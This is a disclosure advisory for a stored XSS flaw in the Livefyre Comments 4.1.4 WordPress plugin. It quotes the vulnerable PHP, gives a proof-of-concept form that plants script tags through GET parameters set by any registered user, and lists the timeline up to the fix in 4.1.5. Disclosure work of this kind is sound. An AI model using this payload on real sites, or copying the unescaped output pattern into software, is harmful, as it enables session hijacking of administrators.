02-08-2015 / Vulnerabilities

Livefyre Comments 3 4.1.4 XSS

Every registered user can change livefyre_site_id and livefyre_site_key.

File: livefyre-comments\src\admin\Livefyre_Admin.php

function __construct( $lf_core ) {
    $this->lf_core = $lf_core;
    $this->ext = $lf_core->ext;
    add_action( 'admin_menu', array( &$this, 'register_admin_page' ) );
    add_action( 'admin_notices', array( &$this, 'lf_install_warning') );
    add_action( 'admin_init', array( &$this->lf_core->Admin, 'plugin_upgrade' ) );
    add_action( 'admin_init', array( &$this, 'site_options_init' ) );
    add_action( 'network_admin_menu', array(&$this, 'register_network_admin_page' ) );
    add_action( 'admin_init', array( &$this, 'network_options_init' ) );
    add_action( 'network_admin_edit_save_network_options', array($this, 'do_save_network_options'), 10, 0);
}
function site_options_init() {
    $name = 'livefyre';
    $section_name = 'lf_site_settings';
    $settings_section = 'livefyre_site_options';
    register_setting( $settings_section, 'livefyre_site_id' );
    register_setting( $settings_section, 'livefyre_site_key' );
    register_setting( $settings_section, 'livefyre_domain_name' );
    register_setting( $settings_section, 'livefyre_domain_key' );
    register_setting( $settings_section, 'livefyre_auth_delegate_name' );
    register_setting( $settings_section, 'livefyre_environment' );
    if( $this->returned_from_setup() ) {
        $this->ext->update_option( "livefyre_site_id", $_GET["site_id"] );
        $this->ext->update_option( "livefyre_site_key", $_GET["secretkey"] );
    }
}
function returned_from_setup() {
    return ( isset($_GET['lf_login_complete']) && $_GET['lf_login_complete']=='1' );
}

Because datas are not escaped we have XSS:

File: livefyre-comments\src\admin\settings-template.php

<h1>Site Settings</h1>
    <p class="lf_label">Livefyre Site ID: </p>
    <?php echo '<p class="lf_text">' .get_option('livefyre_site_id'). '</p>'; ?>
    <br />
    <p class="lf_label">Livefyre Site Key: </p>
    <?php echo '<p class="lf_text">' .get_option('livefyre_site_key'). '</p>'; ?>

Proof of Concept

Login as regular user (created using wp-login.php?action=register):

<form method="GET" action="http://wordpress-url/wp-admin/">
    <input type="hidden" name="lf_login_complete" value="1">
    XSS 1: <input type="text" name="site_id" value="&lt;script&gt;alert(String.fromCharCode(88,83,83,49));&lt;/script&gt;"><br />
    XSS 2: <input type="text" name="secretkey" value="&lt;script&gt;alert(String.fromCharCode(88,83,83,50));&lt;/script&gt;"><br />
    <input type="submit" value="Hack!">
</form>

XSS will be visible for admin:

http://wordpress-url/wp-admin/options-general.php?page=livefyre

Timeline

  • 28-11-2014: Discovered
  • 28-11-2014: Vendor notified
  • 05-12-2014: Version 4.1.5 released, issue resolved